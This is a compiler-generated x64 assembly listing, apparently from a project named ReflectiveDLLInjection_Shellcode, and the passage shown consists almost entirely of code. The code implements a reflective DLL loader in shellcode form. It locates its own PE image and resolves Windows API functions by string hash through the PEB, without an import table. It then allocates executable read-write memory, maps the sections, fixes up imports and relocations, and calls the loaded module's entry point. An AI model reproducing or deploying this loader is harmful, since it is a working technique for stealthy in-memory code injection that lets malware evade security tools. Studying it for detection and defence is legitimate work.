	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressesPointers$11[rsp], rax
; Line 268
	mov	QWORD PTR i$5[rsp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	rax, QWORD PTR i$5[rsp]
	inc	rax
	mov	QWORD PTR i$5[rsp], rax
	mov	rax, QWORD PTR pNamePointers$6[rsp]
	add	rax, 4
	mov	QWORD PTR pNamePointers$6[rsp], rax
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	add	rax, 2
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
$LN6@get_functi:
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	QWORD PTR i$5[rsp], rax
	jae	SHORT $LN5@get_functi
; Line 270
	lea	rcx, QWORD PTR $T9[rsp]
	call	??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ; importless_api::importless_api<505452226>::importless_api<505452226>
	mov	rcx, rax
	call	?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ; importless_api::importless_api<505452226>::get_hash
	mov	rcx, QWORD PTR pNamePointers$6[rsp]
	mov	ecx, DWORD PTR [rcx]
	mov	rdx, QWORD PTR hBase$1[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	mov	edx, eax
	call	?hash_str@importless_api@@YAIPEBDI@Z	; importless_api::hash_str
	mov	DWORD PTR func_hash$3[rsp], eax
; Line 271
	cmp	DWORD PTR func_hash$3[rsp], 1792835440	; 6adc7f70H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	movzx	eax, WORD PTR [rax]
	mov	rcx, QWORD PTR pAddressesPointers$11[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR dwFuncRVA$4[rsp], eax
; Line 276
	mov	eax, DWORD PTR dwFuncRVA$4[rsp]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	$LN4@get_functi
$LN5@get_functi:
$LN7@get_functi:
; Line 281
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR curr_module$[rsp], rax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	add	rsp, 136				; 00000088H
	ret	0
?get_function@?$importless_api@$0GKNMHPHA@@importless_api@@QEAAPEAXXZ ENDP ; importless_api::importless_api<1792835440>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0GKNMHPHA@@importless_api@@QEAA@XZ
_TEXT	SEGMENT
this$ = 8
??0?$importless_api@$0GKNMHPHA@@importless_api@@QEAA@XZ PROC ; importless_api::importless_api<1792835440>::importless_api<1792835440>, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	mov	QWORD PTR [rsp+8], rcx
; Line 237
	mov	rax, QWORD PTR this$[rsp]
	mov	DWORD PTR [rax], 1792835440		; 6adc7f70H
; Line 238
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0?$importless_api@$0GKNMHPHA@@importless_api@@QEAA@XZ ENDP ; importless_api::importless_api<1792835440>::importless_api<1792835440>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0GKNMHPHA@@importless_api@@AEAAPEBUPEB_T@win@2@XZ
_TEXT	SEGMENT
this$ = 8
?peb@?$importless_api@$0GKNMHPHA@@importless_api@@AEAAPEBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<1792835440>::peb, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	mov	QWORD PTR [rsp+8], rcx
; Line 215
	mov	rax, QWORD PTR gs:[96]
; Line 227
	ret	0
?peb@?$importless_api@$0GKNMHPHA@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<1792835440>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
dwCurrentEntry$1 = 32
dwNtHeaders$ = 40
dwBaseAddress$ = 48
dwRelocationBlock$2 = 56
dwPeAddress$ = 64
dwRelocBlock$3 = 72
dwLibraryAddress$4 = 80
dwFirstThunk$5 = 88
dwOriginalFirstThunk$6 = 96
dwImportDirectoryAddress$ = 104
j$7 = 112
dwCurrentSection$ = 120
i$8 = 128
dwDeltaAddresses$ = 136
i$9 = 144
i$10 = 152
dwLibraryExportDirectoryAddress$11 = 160
dwRelocationDirectory$ = 168
$T12 = 176
$T13 = 180
$T14 = 184
$T15 = 188
tv86 = 192
dwSectionPhysicalAddress$16 = 200
dwSectionVirtualAddress$17 = 208
dwImportDirectory$ = 216
tv171 = 224
dwLibraryNtHeaders$18 = 232
dwLibraryExportDirectory$19 = 240
dwLibraryExport_AddressOfFunctions$20 = 248
dwLibraryOrdinalPosition$21 = 256
dwLibraryOrdinalFunctionRVA$22 = 264
dwLibraryOrdinalFunctionAbsolute$23 = 272
dwThunkImportByName$24 = 280
tv214 = 288
dwNumberOfEntries$25 = 296
dwEntryAddress$ = 304
?reflective_injection@@YAHXZ PROC			; reflective_injection
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 37
$LN37:
	sub	rsp, 328				; 00000148H
; Line 52
	call	?caller@@YA_KXZ				; caller
	mov	QWORD PTR dwPeAddress$[rsp], rax
$LN2@reflective:
; Line 53
	xor	eax, eax
	cmp	eax, 1
	je	SHORT $LN3@reflective
; Line 55
	mov	rax, QWORD PTR dwPeAddress$[rsp]
	movzx	eax, WORD PTR [rax]
	cmp	eax, 23117				; 00005a4dH
	jne	SHORT $LN22@reflective
; Line 57
	mov	rax, QWORD PTR dwPeAddress$[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	QWORD PTR dwNtHeaders$[rsp], rax
; Line 61
	cmp	QWORD PTR dwNtHeaders$[rsp], 64		; 00000040H
	jb	SHORT $LN23@reflective
	cmp	QWORD PTR dwNtHeaders$[rsp], 1024	; 00000400H
	jae	SHORT $LN23@reflective
; Line 63
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	mov	rcx, QWORD PTR dwPeAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwNtHeaders$[rsp], rax
; Line 66
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	cmp	DWORD PTR [rax], 17744			; 00004550H
	jne	SHORT $LN24@reflective
; Line 67
	jmp	SHORT $LN3@reflective
$LN24@reflective:
$LN23@reflective:
$LN22@reflective:
; Line 72
	mov	rax, QWORD PTR dwPeAddress$[rsp]
	inc	rax
	mov	QWORD PTR dwPeAddress$[rsp], rax
; Line 73
	jmp	SHORT $LN2@reflective
$LN3@reflective:
; Line 93
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	mov	eax, DWORD PTR [rax+80]
	mov	QWORD PTR tv86[rsp], rax
	lea	rcx, QWORD PTR $T12[rsp]
	call	??0?$importless_api@$0GKNMHPHA@@importless_api@@QEAA@XZ ; importless_api::importless_api<1792835440>::importless_api<1792835440>
	mov	rcx, rax
	call	?get_function@?$importless_api@$0GKNMHPHA@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<1792835440>::get_function
	mov	r9d, 64					; 00000040H
	mov	r8d, 12288				; 00003000H
	mov	rcx, QWORD PTR tv86[rsp]
	mov	rdx, rcx
	xor	ecx, ecx
	call	rax
	mov	QWORD PTR dwBaseAddress$[rsp], rax
; Line 96
	mov	QWORD PTR i$8[rsp], 0
	jmp	SHORT $LN6@reflective
$LN4@reflective:
	mov	rax, QWORD PTR i$8[rsp]
	inc	rax
	mov	QWORD PTR i$8[rsp], rax
$LN6@reflective:
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	mov	eax, DWORD PTR [rax+84]
	cmp	QWORD PTR i$8[rsp], rax
	jae	SHORT $LN5@reflective
; Line 98
	mov	rax, QWORD PTR i$8[rsp]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	rcx, QWORD PTR i$8[rsp]
	mov	rdx, QWORD PTR dwPeAddress$[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	movzx	ecx, BYTE PTR [rcx]
	mov	BYTE PTR [rax], cl
; Line 99
	jmp	SHORT $LN4@reflective
$LN5@reflective:
; Line 111
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	movzx	eax, WORD PTR [rax+20]
	mov	rcx, QWORD PTR dwNtHeaders$[rsp]
	lea	rax, QWORD PTR [rcx+rax+24]
	mov	QWORD PTR dwCurrentSection$[rsp], rax
; Line 114
	mov	QWORD PTR i$9[rsp], 0
	jmp	SHORT $LN9@reflective
$LN7@reflective:
	mov	rax, QWORD PTR i$9[rsp]
	inc	rax
	mov	QWORD PTR i$9[rsp], rax
$LN9@reflective:
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	movzx	eax, WORD PTR [rax+6]
	cmp	QWORD PTR i$9[rsp], rax
	jae	$LN8@reflective
; Line 117
	mov	rax, QWORD PTR dwCurrentSection$[rsp]
	mov	eax, DWORD PTR [rax+12]
	mov	QWORD PTR dwSectionVirtualAddress$17[rsp], rax
; Line 120
	mov	rax, QWORD PTR dwCurrentSection$[rsp]
	mov	eax, DWORD PTR [rax+20]
	mov	QWORD PTR dwSectionPhysicalAddress$16[rsp], rax
; Line 123
	mov	QWORD PTR j$7[rsp], 0
	jmp	SHORT $LN12@reflective
$LN10@reflective:
	mov	rax, QWORD PTR j$7[rsp]
	inc	rax
	mov	QWORD PTR j$7[rsp], rax
$LN12@reflective:
	mov	rax, QWORD PTR dwCurrentSection$[rsp]
	mov	eax, DWORD PTR [rax+16]
	cmp	QWORD PTR j$7[rsp], rax
	jae	SHORT $LN11@reflective
; Line 125
	mov	rax, QWORD PTR dwSectionPhysicalAddress$16[rsp]
	mov	rcx, QWORD PTR dwPeAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	rcx, QWORD PTR dwSectionVirtualAddress$17[rsp]
	mov	rdx, QWORD PTR dwBaseAddress$[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	mov	rdx, QWORD PTR j$7[rsp]
	mov	r8, QWORD PTR j$7[rsp]
	movzx	eax, BYTE PTR [rax+r8]
	mov	BYTE PTR [rcx+rdx], al
; Line 126
	jmp	SHORT $LN10@reflective
$LN11@reflective:
; Line 129
	mov	rax, QWORD PTR dwCurrentSection$[rsp]
	add	rax, 40					; 00000028H
	mov	QWORD PTR dwCurrentSection$[rsp], rax
; Line 130
	jmp	$LN7@reflective
$LN8@reflective:
; Line 142
	mov	eax, 8
	imul	rax, rax, 1
	mov	rcx, QWORD PTR dwNtHeaders$[rsp]
	lea	rax, QWORD PTR [rcx+rax+136]
	mov	QWORD PTR dwImportDirectory$[rsp], rax
; Line 145
	mov	rax, QWORD PTR dwImportDirectory$[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwImportDirectoryAddress$[rsp], rax
$LN13@reflective:
; Line 148
	mov	rax, QWORD PTR dwImportDirectoryAddress$[rsp]
	cmp	DWORD PTR [rax+12], 0
	je	$LN14@reflective
; Line 150
	mov	rax, QWORD PTR dwImportDirectoryAddress$[rsp]
	mov	eax, DWORD PTR [rax+12]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv171[rsp], rax
	lea	rcx, QWORD PTR $T13[rsp]
	call	??0?$importless_api@$0FEPMOHEI@@importless_api@@QEAA@XZ ; importless_api::importless_api<1425860424>::importless_api<1425860424>
	mov	rcx, rax
	call	?get_function@?$importless_api@$0FEPMOHEI@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<1425860424>::get_function
	mov	rcx, QWORD PTR tv171[rsp]
	call	rax
	mov	QWORD PTR dwLibraryAddress$4[rsp], rax
; Line 153
	mov	rax, QWORD PTR dwImportDirectoryAddress$[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwOriginalFirstThunk$6[rsp], rax
; Line 156
	mov	rax, QWORD PTR dwImportDirectoryAddress$[rsp]
	mov	eax, DWORD PTR [rax+16]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwFirstThunk$5[rsp], rax
$LN15@reflective:
; Line 159
	mov	rax, QWORD PTR dwFirstThunk$5[rsp]
	cmp	QWORD PTR [rax], 0
	je	$LN16@reflective
; Line 162
	cmp	QWORD PTR dwOriginalFirstThunk$6[rsp], 0
	je	$LN25@reflective
	mov	rax, QWORD PTR dwOriginalFirstThunk$6[rsp]
	mov	rcx, -9223372036854775808		; 8000000000000000H
	mov	rax, QWORD PTR [rax]
	and	rax, rcx
	test	rax, rax
	je	$LN25@reflective
; Line 164
	mov	rax, QWORD PTR dwLibraryAddress$4[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR dwLibraryAddress$4[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwLibraryNtHeaders$18[rsp], rax
; Line 166
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR dwLibraryNtHeaders$18[rsp]
	lea	rax, QWORD PTR [rcx+rax+136]
	mov	QWORD PTR dwLibraryExportDirectory$19[rsp], rax
; Line 168
	mov	rax, QWORD PTR dwLibraryExportDirectory$19[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR dwLibraryAddress$4[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwLibraryExportDirectoryAddress$11[rsp], rax
; Line 170
	mov	rax, QWORD PTR dwLibraryExportDirectoryAddress$11[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR dwLibraryAddress$4[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwLibraryExport_AddressOfFunctions$20[rsp], rax
; Line 173
	mov	rax, QWORD PTR dwOriginalFirstThunk$6[rsp]
	mov	rax, QWORD PTR [rax]
	and	rax, 65535				; 0000ffffH
	mov	rcx, QWORD PTR dwLibraryExportDirectoryAddress$11[rsp]
	mov	ecx, DWORD PTR [rcx+16]
	sub	rax, rcx
	mov	QWORD PTR dwLibraryOrdinalPosition$21[rsp], rax
; Line 178
	mov	rax, QWORD PTR dwLibraryExport_AddressOfFunctions$20[rsp]
	mov	rcx, QWORD PTR dwLibraryOrdinalPosition$21[rsp]
	lea	rax, QWORD PTR [rax+rcx*4]
	mov	QWORD PTR dwLibraryOrdinalFunctionRVA$22[rsp], rax
; Line 180
	mov	eax, -1					; ffffffffH
	mov	rcx, QWORD PTR dwLibraryOrdinalFunctionRVA$22[rsp]
	and	rcx, rax
	mov	rax, rcx
	mov	rcx, QWORD PTR dwLibraryAddress$4[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwLibraryOrdinalFunctionAbsolute$23[rsp], rax
; Line 183
	mov	rax, QWORD PTR dwFirstThunk$5[rsp]
	mov	rcx, QWORD PTR dwLibraryOrdinalFunctionAbsolute$23[rsp]
	mov	QWORD PTR [rax], rcx
; Line 184
	jmp	SHORT $LN26@reflective
$LN25@reflective:
; Line 188
	mov	rax, QWORD PTR dwFirstThunk$5[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwThunkImportByName$24[rsp], rax
; Line 191
	mov	rax, QWORD PTR dwThunkImportByName$24[rsp]
	add	rax, 2
	mov	QWORD PTR tv214[rsp], rax
	lea	rcx, QWORD PTR $T14[rsp]
	call	??0?$importless_api@$0CBOPAGBI@@importless_api@@QEAA@XZ ; importless_api::importless_api<569312792>::importless_api<569312792>
	mov	rcx, rax
	call	?get_function@?$importless_api@$0CBOPAGBI@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<569312792>::get_function
	mov	rcx, QWORD PTR tv214[rsp]
	mov	rdx, rcx
	mov	rcx, QWORD PTR dwLibraryAddress$4[rsp]
	call	rax
	mov	rcx, QWORD PTR dwFirstThunk$5[rsp]
	mov	QWORD PTR [rcx], rax
$LN26@reflective:
; Line 195
	mov	rax, QWORD PTR dwFirstThunk$5[rsp]
	add	rax, 8
	mov	QWORD PTR dwFirstThunk$5[rsp], rax
; Line 196
	cmp	QWORD PTR dwOriginalFirstThunk$6[rsp], 0
	je	SHORT $LN27@reflective
; Line 197
	mov	rax, QWORD PTR dwOriginalFirstThunk$6[rsp]
	add	rax, 8
	mov	QWORD PTR dwOriginalFirstThunk$6[rsp], rax
$LN27@reflective:
; Line 199
	jmp	$LN15@reflective
$LN16@reflective:
; Line 202
	mov	rax, QWORD PTR dwImportDirectoryAddress$[rsp]
	add	rax, 20
	mov	QWORD PTR dwImportDirectoryAddress$[rsp], rax
; Line 203
	jmp	$LN13@reflective
$LN14@reflective:
; Line 215
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	mov	rax, QWORD PTR [rax+48]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwDeltaAddresses$[rsp], rax
; Line 217
	mov	eax, 8
	imul	rax, rax, 5
	mov	rcx, QWORD PTR dwNtHeaders$[rsp]
	lea	rax, QWORD PTR [rcx+rax+136]
	mov	QWORD PTR dwRelocationDirectory$[rsp], rax
; Line 220
	mov	rax, QWORD PTR dwRelocationDirectory$[rsp]
	cmp	DWORD PTR [rax+4], 0
	je	$LN28@reflective
; Line 222
	mov	rax, QWORD PTR dwRelocationDirectory$[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwRelocBlock$3[rsp], rax
$LN17@reflective:
; Line 226
	mov	rax, QWORD PTR dwRelocBlock$3[rsp]
	cmp	DWORD PTR [rax+4], 0
	je	$LN18@reflective
; Line 228
	mov	rax, QWORD PTR dwRelocBlock$3[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwRelocationBlock$2[rsp], rax
; Line 230
	mov	rax, QWORD PTR dwRelocBlock$3[rsp]
	mov	eax, DWORD PTR [rax+4]
	sub	rax, 8
	xor	edx, edx
	mov	ecx, 2
	div	rcx
	mov	QWORD PTR dwNumberOfEntries$25[rsp], rax
; Line 233
	mov	rax, QWORD PTR dwRelocBlock$3[rsp]
	add	rax, 8
	mov	QWORD PTR dwCurrentEntry$1[rsp], rax
; Line 236
	mov	QWORD PTR i$10[rsp], 0
	jmp	SHORT $LN21@reflective
$LN19@reflective:
	mov	rax, QWORD PTR i$10[rsp]
	inc	rax
	mov	QWORD PTR i$10[rsp], rax
$LN21@reflective:
	mov	rax, QWORD PTR dwNumberOfEntries$25[rsp]
	cmp	QWORD PTR i$10[rsp], rax
	jae	$LN20@reflective
; Line 238
	mov	rax, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	eax, WORD PTR [rax]
	shr	ax, 12
	and	ax, 15
	movzx	eax, ax
	cmp	eax, 10
	jne	SHORT $LN29@reflective
; Line 240
	mov	eax, 4095				; 00000fffH
	mov	rcx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	ecx, WORD PTR [rcx]
	and	cx, ax
	movzx	eax, cx
	movzx	eax, ax
	mov	rcx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	rax, QWORD PTR [rcx+rax]
	add	rax, QWORD PTR dwDeltaAddresses$[rsp]
	mov	ecx, 4095				; 00000fffH
	mov	rdx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	edx, WORD PTR [rdx]
	and	dx, cx
	movzx	ecx, dx
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	QWORD PTR [rdx+rcx], rax
; Line 241
	jmp	$LN30@reflective
$LN29@reflective:
; Line 242
	mov	rax, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	eax, WORD PTR [rax]
	shr	ax, 12
	and	ax, 15
	movzx	eax, ax
	cmp	eax, 3
	jne	SHORT $LN31@reflective
; Line 244
	mov	eax, 4095				; 00000fffH
	mov	rcx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	ecx, WORD PTR [rcx]
	and	cx, ax
	movzx	eax, cx
	movzx	eax, ax
	mov	rcx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	eax, DWORD PTR [rcx+rax]
	add	eax, DWORD PTR dwDeltaAddresses$[rsp]
	mov	ecx, 4095				; 00000fffH
	mov	rdx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	edx, WORD PTR [rdx]
	and	dx, cx
	movzx	ecx, dx
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	DWORD PTR [rdx+rcx], eax
; Line 245
	jmp	$LN32@reflective
$LN31@reflective:
; Line 246
	mov	rax, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	eax, WORD PTR [rax]
	shr	ax, 12
	and	ax, 15
	movzx	eax, ax
	cmp	eax, 1
	jne	SHORT $LN33@reflective
; Line 248
	mov	eax, 4095				; 00000fffH
	mov	rcx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	ecx, WORD PTR [rcx]
	and	cx, ax
	movzx	eax, cx
	movzx	eax, ax
	mov	rcx, QWORD PTR dwDeltaAddresses$[rsp]
	shr	rcx, 16
	and	rcx, 65535				; 0000ffffH
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	movzx	eax, WORD PTR [rdx+rax]
	add	eax, ecx
	mov	ecx, 4095				; 00000fffH
	mov	rdx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	edx, WORD PTR [rdx]
	and	dx, cx
	movzx	ecx, dx
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	WORD PTR [rdx+rcx], ax
; Line 249
	jmp	SHORT $LN34@reflective
$LN33@reflective:
; Line 250
	mov	rax, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	eax, WORD PTR [rax]
	shr	ax, 12
	and	ax, 15
	movzx	eax, ax
	cmp	eax, 2
	jne	SHORT $LN35@reflective
; Line 252
	mov	eax, 4095				; 00000fffH
	mov	rcx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	ecx, WORD PTR [rcx]
	and	cx, ax
	movzx	eax, cx
	movzx	eax, ax
	mov	rcx, QWORD PTR dwDeltaAddresses$[rsp]
	and	rcx, 65535				; 0000ffffH
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	movzx	eax, WORD PTR [rdx+rax]
	add	eax, ecx
	mov	ecx, 4095				; 00000fffH
	mov	rdx, QWORD PTR dwCurrentEntry$1[rsp]
	movzx	edx, WORD PTR [rdx]
	and	dx, cx
	movzx	ecx, dx
	movzx	ecx, cx
	mov	rdx, QWORD PTR dwRelocationBlock$2[rsp]
	mov	WORD PTR [rdx+rcx], ax
$LN35@reflective:
$LN34@reflective:
$LN32@reflective:
$LN30@reflective:
; Line 256
	mov	rax, QWORD PTR dwCurrentEntry$1[rsp]
	add	rax, 2
	mov	QWORD PTR dwCurrentEntry$1[rsp], rax
; Line 259
	jmp	$LN19@reflective
$LN20@reflective:
; Line 262
	mov	rax, QWORD PTR dwRelocBlock$3[rsp]
	mov	eax, DWORD PTR [rax+4]
	mov	rcx, QWORD PTR dwRelocBlock$3[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwRelocBlock$3[rsp], rax
; Line 263
	jmp	$LN17@reflective
$LN18@reflective:
$LN28@reflective:
; Line 275
	mov	rax, QWORD PTR dwNtHeaders$[rsp]
	mov	eax, DWORD PTR [rax+40]
	mov	rcx, QWORD PTR dwBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR dwEntryAddress$[rsp], rax
; Line 280
	lea	rcx, QWORD PTR $T15[rsp]
	call	??0?$importless_api@$0LEDCLCND@@importless_api@@QEAA@XZ ; importless_api::importless_api<3023221459>::importless_api<3023221459>
	mov	rcx, rax
	call	?get_function@?$importless_api@$0LEDCLCND@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<3023221459>::get_function
	xor	r8d, r8d
	xor	edx, edx
	mov	rcx, -1
	call	rax
; Line 287
	call	QWORD PTR dwEntryAddress$[rsp]
; Line 288
	add	rsp, 328				; 00000148H
	ret	0
?reflective_injection@@YAHXZ ENDP			; reflective_injection
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
__$ReturnAddr$ = 0
?caller@@YA_KXZ PROC					; caller
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 20
	mov	rax, QWORD PTR __$ReturnAddr$[rsp]
	ret	0
?caller@@YA_KXZ ENDP					; caller
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?hash_str@importless_api@@YAIPEBDI@Z
_TEXT	SEGMENT
c$1 = 0
hash$ = 4
func_name$ = 32
value$ = 40
?hash_str@importless_api@@YAIPEBDI@Z PROC		; importless_api::hash_str, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 193
$LN7:
	mov	DWORD PTR [rsp+16], edx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 195
	mov	eax, DWORD PTR value$[rsp]
	mov	DWORD PTR hash$[rsp], eax
$LN2@hash_str:
; Line 198
	mov	rax, QWORD PTR func_name$[rsp]
	movzx	eax, BYTE PTR [rax]
	mov	BYTE PTR c$1[rsp], al
; Line 199
	mov	rax, QWORD PTR func_name$[rsp]
	inc	rax
	mov	QWORD PTR func_name$[rsp], rax
; Line 200
	movsx	eax, BYTE PTR c$1[rsp]
	test	eax, eax
	jne	SHORT $LN5@hash_str
; Line 201
	mov	eax, DWORD PTR hash$[rsp]
	jmp	SHORT $LN1@hash_str
$LN5@hash_str:
; Line 203
	mov	eax, DWORD PTR hash$[rsp]
	shl	eax, 5
	mov	ecx, DWORD PTR hash$[rsp]
	shr	ecx, 27
	or	eax, ecx
	movsx	ecx, BYTE PTR c$1[rsp]
	add	eax, ecx
	mov	DWORD PTR hash$[rsp], eax
; Line 204
	jmp	SHORT $LN2@hash_str
$LN1@hash_str:
; Line 205
	add	rsp, 24
	ret	0
?hash_str@importless_api@@YAIPEBDI@Z ENDP		; importless_api::hash_str
_TEXT	ENDS
END
